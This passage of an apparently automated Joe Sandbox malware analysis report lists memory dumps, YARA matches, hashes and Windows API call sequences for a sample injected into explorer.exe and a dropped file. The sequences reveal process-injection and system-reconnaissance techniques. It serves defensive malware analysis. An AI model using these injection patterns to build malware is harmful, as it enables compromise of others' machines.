• Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
Yara matches
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSleepSnapshotToolhelp32
• String ID:
• API String ID: 2482764027-0
• Opcode ID: d87648c068091f5a601a251f696ac908138681014b07281b27555691989c57a1
• Instruction ID: 3ea950034da55c5ea781f07bc4357f306840e9bde7d599f9b92749dc35bbde7e
• Opcode Fuzzy Hash: d87648c068091f5a601a251f696ac908138681014b07281b27555691989c57a1
• Instruction Fuzzy Hash: 4521B730118A098FDF18EF6CC0987AA72E2FF88325F140ABAE84FDE155EB358545C715

Control-flow Graph

Control-flow graph (rendered in the original report): basic blocks 8581a60-8581d8f; calls RtlCreateHeap, CreateThread (x2)
APIs
Strings
Memory Dump Source
• Source File: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Offset: 08581000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_8581000_explorer.jbxd
Yara matches
Similarity
• API ID: Create$Thread$Heap
• String ID: iP+
• API String ID: 1054751041-51890417
• Opcode ID: 2cb0cc4895ba9d61a021ba4609a68b07abc7c0267e95d8eab074489c4e5da047
• Instruction ID: 59dd8eba0a8a96ad0b4faa55182fdb2a44d8d4ffb935b636bfe2208e05cf1dfe
• Opcode Fuzzy Hash: 2cb0cc4895ba9d61a021ba4609a68b07abc7c0267e95d8eab074489c4e5da047
• Instruction Fuzzy Hash: E091C230618E09CFCF54FF28D891AA573D6FB98302F0441BE9C4EDB256EA34D5428B96

Control-flow Graph

APIs
Memory Dump Source
• Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
Yara matches
Similarity
• API ID: File$AttributesCreateTime
• String ID:
• API String ID: 1986686026-0
• Opcode ID: 608125a8aa1bce6175559d74748fb29477d2e5ca9ccfc86ce4b79151e6103723
• Instruction ID: 1d1bd6a820973ecfda9322e3c635c34c4c8f9000e4b91eeee50b4fe2f8990d89
• Opcode Fuzzy Hash: 608125a8aa1bce6175559d74748fb29477d2e5ca9ccfc86ce4b79151e6103723
• Instruction Fuzzy Hash: 3D212F3070CA488FDF64EF68988979EB6E2FBD8701F10456EA84EC7245DA34DA058782

Control-flow Graph

Control-flow graph (rendered in the original report): basic blocks 2994e90-2994f9f; calls RegQueryValueExA, ObtainUserAgentString
APIs
• RegQueryValueExA.KERNEL32 ref: 02994F15
• ObtainUserAgentString.URLMON ref: 02994F7E
Memory Dump Source
• Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
Yara matches
Similarity
• API ID: AgentObtainQueryStringUserValue
• String ID:
• API String ID: 4107646653-0
• Opcode ID: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
• Instruction ID: fae0cd4fc871c46ad610fcf7cb8e665ea3131d80b91300a92c3664bcbe87132f
• Opcode Fuzzy Hash: 1ee60c0f534f3764a8b7c02e3106e8c1bbbc8228cd7f8668cbf5d1b2e0d7aa71
• Instruction Fuzzy Hash: 1F318431608A4D8FDF19EF6CD8896EA77D6FB98324B04427AE84EC3545EF70D8068791

Control-flow Graph

APIs
  • Part of subcall function 08584D20: GetVolumeInformationA.KERNEL32 ref: 08584D8D
• CreateMutexExA.KERNEL32 ref: 08581E8F
• CreateFileMappingA.KERNEL32 ref: 08581F41
Memory Dump Source
• Source File: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Offset: 08581000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_8581000_explorer.jbxd
Yara matches
Similarity
• API ID: Create$FileInformationMappingMutexVolume
• String ID:
• API String ID: 3260430491-0
• Opcode ID: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
• Instruction ID: 33c2998c103300dffa3cf3bd1557a2e1234bb84ef2dc45fe3bd9f2bff01a861d
• Opcode Fuzzy Hash: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
• Instruction Fuzzy Hash: AF413D30714F09CFEB64FF3880587AA76D2FB98707F104A2E845EE6244DF7496069B85

Control-flow Graph

APIs
  • Part of subcall function 02994D20: GetVolumeInformationA.KERNEL32 ref: 02994D8D
• CreateMutexExA.KERNEL32 ref: 02991E8F
• CreateFileMappingA.KERNEL32 ref: 02991F41
Memory Dump Source
• Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
Yara matches
Similarity
• API ID: Create$FileInformationMappingMutexVolume
• String ID:
• API String ID: 3260430491-0
• Opcode ID: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
• Instruction ID: b4a21053f043027a211f57d5536fcee26d316f27ef11ba6cf67253956f903fb3
• Opcode Fuzzy Hash: 9e9a34ea7cb298080777c61faf39ef342cf239ea35ae18d0dbcb535cd23d3ff0
• Instruction Fuzzy Hash: 0A415F30714F0C8FDB65EB3880187AE76D2FB98726F504A3E905EC6184CF7496029B81

Control-flow Graph

APIs
• GetTokenInformation.KERNELBASE ref: 08584B24
• GetTokenInformation.KERNELBASE ref: 08584B5B
Memory Dump Source
• Source File: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Offset: 08581000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_8581000_explorer.jbxd
Yara matches
Similarity
• API ID: InformationToken
• String ID:
• API String ID: 4114910276-0
• Opcode ID: 37b38c91b308edf2e4bebcb754188a08756fa8f3a9c0e1e81f7644c00244d549
• Instruction ID: 8bf392e97913917a24da158dfa70e584b2e304af3eea98838c95fc224281f669
• Opcode Fuzzy Hash: 37b38c91b308edf2e4bebcb754188a08756fa8f3a9c0e1e81f7644c00244d549
• Instruction Fuzzy Hash: 06213E34608B098FC754FF28C49866AB7E1FBD9311B044A6EA49AD7364DE30D845DB82

                                                                                                                    Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • GetTokenInformation.KERNELBASE ref: 02994B24
                                                                                                                    • GetTokenInformation.KERNELBASE ref: 02994B5B
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationToken
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 4114910276-0
                                                                                                                    • Opcode ID: 37b38c91b308edf2e4bebcb754188a08756fa8f3a9c0e1e81f7644c00244d549
                                                                                                                    • Instruction ID: 61d484cae4bda54fe213f90ae095f7fcfc616a98ee0b260ff2e186b95d8fcefe
                                                                                                                    • Opcode Fuzzy Hash: 37b38c91b308edf2e4bebcb754188a08756fa8f3a9c0e1e81f7644c00244d549
                                                                                                                    • Instruction Fuzzy Hash: 10213334608A088FCB55EB2CC45866AB7E2FBD9311B054A6EA49AC7254DB30D845DB42

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 515 8583c84-8583c9b 516 8583d3b-8583d54 515->516 517 8583ca1-8583cb3 CreateToolhelp32Snapshot 515->517 518 8583d23-8583d35 SleepEx 517->518 519 8583cb5-8583ccb 517->519 518->516 518->517 521 8583d16-8583d18 519->521 522 8583d1a-8583d1b 521->522 523 8583ccd-8583ce4 call 8585140 521->523 522->518 526 8583ce6-8583ce8 523->526 527 8583cea-8583cf8 526->527 528 8583cfc-8583d03 call 85847a4 526->528 527->526 529 8583cfa 527->529 531 8583d08-8583d0e 528->531 529->531 531->521
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Offset: 08581000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8581000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateSleepSnapshotToolhelp32
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 684154974-0
                                                                                                                    • Opcode ID: d87648c068091f5a601a251f696ac908138681014b07281b27555691989c57a1
                                                                                                                    • Instruction ID: 42e53e7daaf73dbce8ef9b2b9c6ad56129e1256e325a4509adf39e3d9e405e05
                                                                                                                    • Opcode Fuzzy Hash: d87648c068091f5a601a251f696ac908138681014b07281b27555691989c57a1
                                                                                                                    • Instruction Fuzzy Hash: 56219330218A09CFDB14FF64C0987EA76D2FF88356F140A7ED84BEA255DB7495458711

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 535 8583d60-8583d70 536 8583d72-8583d94 EnumWindows SleepEx 535->536 537 8583d96-8583da4 535->537 536->536 536->537
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Offset: 08581000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8581000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumSleepWindows
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 498413330-0
                                                                                                                    • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                                    • Instruction ID: 6d855e1563995670fc1348433018a6d1e5401944f836b680748c42234916f2c6
                                                                                                                    • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                                    • Instruction Fuzzy Hash: 00E04F30505A09CFEB28ABA4C0DCBF036A1FB18246F1401BFDC0EED295CB7A4945CB20

                                                                                                                    Control-flow Graph

                                                                                                                    control_flow_graph 532 2993d60-2993d70 533 2993d72-2993d94 EnumWindows SleepEx 532->533 534 2993d96-2993da4 532->534 533->533 533->534
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumSleepWindows
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 498413330-0
                                                                                                                    • Opcode ID: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                                    • Instruction ID: 8264e15d8b57d81164fd090b3a15cf603a1a21f7372fbd8d2b3e9906dc2c7998
                                                                                                                    • Opcode Fuzzy Hash: bcd33d68b26800d53c1a0055312e6970b5242bc1254dfeb745dd1bbf27494588
                                                                                                                    • Instruction Fuzzy Hash: 6AE04F30505A098FEF28AFA8C0DCBB032A5EB18256F1401BADC0EDD295CB764945C724
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: e4a96c0002796f4483eb6bc6feb746ec78d293e7f1134298137c4194076fbbcd
                                                                                                                    • Instruction ID: 8454c1eaa0fa940ca990caeb2c1ba2378f54329218fdaabf3f41a054468833e9
                                                                                                                    • Opcode Fuzzy Hash: e4a96c0002796f4483eb6bc6feb746ec78d293e7f1134298137c4194076fbbcd
                                                                                                                    • Instruction Fuzzy Hash: 19D17E30718B098BDF65EF6C94467AEB7E6FB98711F10452EE44AD3241DF74E8428B82
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Offset: 08581000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8581000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: 11cbd7d4e9e3daf7bdfec7693b32ce184b43af76b4895d117b786d6ffa4ff202
                                                                                                                    • Instruction ID: a1c683ce3b278adf1e69514ddda66e4030ecdef3b1c1efa143a7d4506311b6a4
                                                                                                                    • Opcode Fuzzy Hash: 11cbd7d4e9e3daf7bdfec7693b32ce184b43af76b4895d117b786d6ffa4ff202
                                                                                                                    • Instruction Fuzzy Hash: E0413930718A4D8FDBA8BFAC945836E76D2FBC8212F14457EA80ED3385DE749D068785
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Offset: 08581000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8581000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
                                                                                                                    • Instruction ID: ed35abaa17558035c0e75123278e37d883c4dc9c7372b06e796ad6d8cc25f435
                                                                                                                    • Opcode Fuzzy Hash: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
                                                                                                                    • Instruction Fuzzy Hash: 8D41B23471CB0D8FD758BB6C94593BAB6C2FBC8612F14022EA89BD3355EE64980243C2
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateFile
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 823142352-0
                                                                                                                    • Opcode ID: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
                                                                                                                    • Instruction ID: b99120e54768543fa6ab25e6d38b9b32ead36e264b8bac80dc6af71364ab55d3
                                                                                                                    • Opcode Fuzzy Hash: ce663faf5a716b1ca10baa4e22fa9f7e4c3774f53785b3b9c2244f163c36e0eb
                                                                                                                    • Instruction Fuzzy Hash: E941EE3031CF0D4FDB59AA2C98593BEB2D6EBC9321F55026EA89FC3240DE64980347C6
                                                                                                                    APIs
                                                                                                                    • GetVolumeInformationA.KERNEL32 ref: 08584D8D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Offset: 08581000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8581000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationVolume
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2039140958-0
                                                                                                                    • Opcode ID: f6d21cd985884bbd1fecacc52d91767e00694267905ea377f3a61296193c8c2d
                                                                                                                    • Instruction ID: b5d83f16a419a5516db6def047a2f47a0f22bbcdea869c37580e460e9e402f05
                                                                                                                    • Opcode Fuzzy Hash: f6d21cd985884bbd1fecacc52d91767e00694267905ea377f3a61296193c8c2d
                                                                                                                    • Instruction Fuzzy Hash: 0A312131618A4C8FDB64FF68C448BAA77E1FBD8311F10466E984ED7264EE70D945CB82
                                                                                                                    APIs
                                                                                                                    • GetVolumeInformationA.KERNEL32 ref: 02994D8D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: InformationVolume
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2039140958-0
                                                                                                                    • Opcode ID: f6d21cd985884bbd1fecacc52d91767e00694267905ea377f3a61296193c8c2d
                                                                                                                    • Instruction ID: bc9fe309621fa8cc02b86886469c61753f036044b33da74c0f41e3ad43a4ea53
                                                                                                                    • Opcode Fuzzy Hash: f6d21cd985884bbd1fecacc52d91767e00694267905ea377f3a61296193c8c2d
                                                                                                                    • Instruction Fuzzy Hash: DF316530618A4C8FDB64EF68C449BAA77E2FBD8311F10466E984EC7264DE70D945CB82
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 08581A60: RtlCreateHeap.NTDLL ref: 08581B77
                                                                                                                    • SleepEx.KERNEL32(?,?,?,?,?,?,?,08581A03), ref: 08581A30
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2716946130.0000000008581000.00000020.80000000.00040000.00000000.sdmp, Offset: 08581000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_8581000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHeapSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 221814145-0
                                                                                                                    • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                    • Instruction ID: 14b8d86e69eed2fde64ac6a308d2f19e9c80488acac673b88b1e385378acb21b
                                                                                                                    • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                    • Instruction Fuzzy Hash: 12E04F24754E09CBDB98BBB8D4C432C7591FBC8252F90197FA91EDB285E824C9838391
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 02991A60: RtlCreateHeap.NTDLL ref: 02991B77
                                                                                                                    • SleepEx.KERNEL32(?,?,?,?,?,?,?,02991A03), ref: 02991A30
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.2713238316.0000000002991000.00000020.80000000.00040000.00000000.sdmp, Offset: 02991000, based on PE: false
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_2991000_explorer.jbxd
                                                                                                                    Yara matches
                                                                                                                    Similarity
                                                                                                                    • API ID: CreateHeapSleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 221814145-0
                                                                                                                    • Opcode ID: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                    • Instruction ID: 9ef4ba2ec605f4677f4192b03451c5bc4481b0c3e8e3bf685c0f3c256c3ac0b5
                                                                                                                    • Opcode Fuzzy Hash: 9adc8d4cde1f516ddaa5c4750073014e5650bc8f10d33b0d75f43d3a0b67238f
                                                                                                                    • Instruction Fuzzy Hash: 3AE04F30718A0A5BDF98BBBC94C432C6195FBC8370F901979691ECA285E924CD858731

Execution Graph

Execution Coverage: 8.6%
Dynamic/Decrypted Code Coverage: 19.9%
Signature Coverage: 0%
Total number of Nodes: 156
Total number of Limit Nodes: 6

Control-flow Graph

APIs
• InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418B8B
• GetFocus.USER32 ref: 00418B91
• ReadConsoleA.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00418B9E
• FindAtomA.KERNEL32(00000000), ref: 00418BA5
• SearchPathA.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BBD
• SetConsoleMode.KERNEL32(00000000,00000000), ref: 00418BC5
• SearchPathW.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 00418BDD
• GetDefaultCommConfigA.KERNEL32(00000000,?,00000000), ref: 00418C04
• CopyFileExW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C10
• CreatePipe.KERNEL32(?,00000000,00000000,00000000), ref: 00418C26
• GetEnvironmentStringsW.KERNEL32 ref: 00418C2C
• WriteConsoleOutputA.KERNEL32(00000000,?,?,?,?), ref: 00418C71
• GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00418C80
• GetSystemTimeAdjustment.KERNEL32(00000000,00000000,00000000), ref: 00418C89
• ObjectPrivilegeAuditAlarmW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00418C9E
• WaitForSingleObject.KERNEL32(00000000,00000000), ref: 00418CAF
• SetCommState.KERNELBASE(00000000,00000000), ref: 00418CD8
• GetConsoleAliasesLengthW.KERNEL32(00000000), ref: 00418D09
• GetComputerNameA.KERNEL32(?,?), ref: 00418D1D
• CopyFileW.KERNEL32(0041A3AC,0041A380,00000000), ref: 00418D2E
• GetFileAttributesA.KERNEL32(00000000), ref: 00418D35
• GetConsoleAliasExesLengthW.KERNEL32 ref: 00418D3B
• GetBinaryType.KERNEL32(0041A3C8,?), ref: 00418D4D
• FormatMessageA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00418D60
• GetLongPathNameA.KERNEL32(0041A3E4,?,00000000), ref: 00418D73
• PurgeComm.KERNEL32(00000000,00000000), ref: 00418D7B
• LoadLibraryA.KERNELBASE(0041A3EC), ref: 00418DF2
• MoveFileW.KERNEL32(00000000,00000000), ref: 00418E27
• InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00418E4E
Strings
Memory Dump Source
• Source File: 00000004.00000002.1849711788.000000000040B000.00000020.00000001.01000000.00000005.sdmp, Offset: 0040B000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_40b000_jtruajj.jbxd
Similarity
• API ID: ConsoleFile$CommNamePath$CompareCopyExchangeInterlockedLengthObjectSearch$AdjustmentAlarmAliasAliasesAtomAttributesAuditBinaryComputerConfigCreateDefaultEnvironmentExesFindFocusFormatLibraryLoadLongMessageModeModuleMoveOutputPipePrivilegePurgeReadSingleStateStringsSystemTimeTypeWaitWrite
• String ID: k`$}$
• API String ID: 2220722107-956986773
• Opcode ID: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
• Instruction ID: 0c0e40555d578e92a9f225f047ccd42c64e3c90cdaccad76b264c498dc6ec0a1
• Opcode Fuzzy Hash: 27396c0720b35830d8978bde3fab0e4ce9b55130db9d37ea9e37c6b107803055
• Instruction Fuzzy Hash: 9FB1A0B1901224ABCB219B65EC58EDF7B78EF49350F00816EF649A3150DB785EC4CFA9

Control-flow Graph

APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
Strings
Memory Dump Source
• Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
Similarity
• API ID: Section$CreateDuplicateObjectView
• String ID: 1
• API String ID: 1652636561-2212294583
• Opcode ID: a3d0a89ba2f0946d3c73b933561f00ce793550d5be3e53aacc3d784ec313288b
• Instruction ID: 7f4d7c4657737381e02ab4131f106e217a3bc84f51a1891dc43a423f49ad99c1
• Opcode Fuzzy Hash: a3d0a89ba2f0946d3c73b933561f00ce793550d5be3e53aacc3d784ec313288b
• Instruction Fuzzy Hash: 14718D71A00205FFEB209F91CC49FEF7BB8EF85B10F14412AF912BA2E5D6759905CA58

Control-flow Graph

APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
Memory Dump Source
• Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
• Instruction ID: 138ec7ca1e8744eb65f40bd9736a53a73cefe8eecd72c79945fcbf62a21b6401
• Opcode Fuzzy Hash: 9208168e61d895202d66972dbe02163783dcb6df2364333cde88f6d05e7d9971
• Instruction Fuzzy Hash: D9616E71900205FBEB209F95DC49FEB7BB8FF81B00F14412AFA12BA1E4D6749A05DB65

Control-flow Graph

APIs
• NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
• NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
• NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
• NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
• NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
Memory Dump Source
• Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
Similarity
• API ID: Section$View$Create$DuplicateObject
• String ID:
• API String ID: 1546783058-0
• Opcode ID: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
• Instruction ID: 46ca3ae5353e1b2bf85c7e7487c0bf4a09c0837efea8bedcf4105f5ea6450319
• Opcode Fuzzy Hash: bf712b81fe7c33e45fb91e121ae8a1411471c4f54e6f2b27f252d32f249b509c
• Instruction Fuzzy Hash: 81512971900245BFEF209F91CC48FEB7BB8EF85B00F14416AF912BA1A5D6749945CB24

Control-flow Graph

                                                                                                                    APIs
                                                                                                                    • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015E4
                                                                                                                    • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401611
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401634
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401652
                                                                                                                    • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401693
                                                                                                                    • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004016C4
                                                                                                                    • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004016E6
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000004.00000002.1849680308.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_4_2_400000_jtruajj.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Section$View$Create$DuplicateObject
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1546783058-0
                                                                                                                    • Opcode ID: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
                                                                                                                    • Instruction ID: 68c08b8250816e380b35483fe5a52fcf5a4ffa7bf922b91d474b11e8be87ed95
                                                                                                                    • Opcode Fuzzy Hash: fdd984ed4eabfdf3fe245d48b6addcc777c2a155290e4dc39758af1e8cc42314
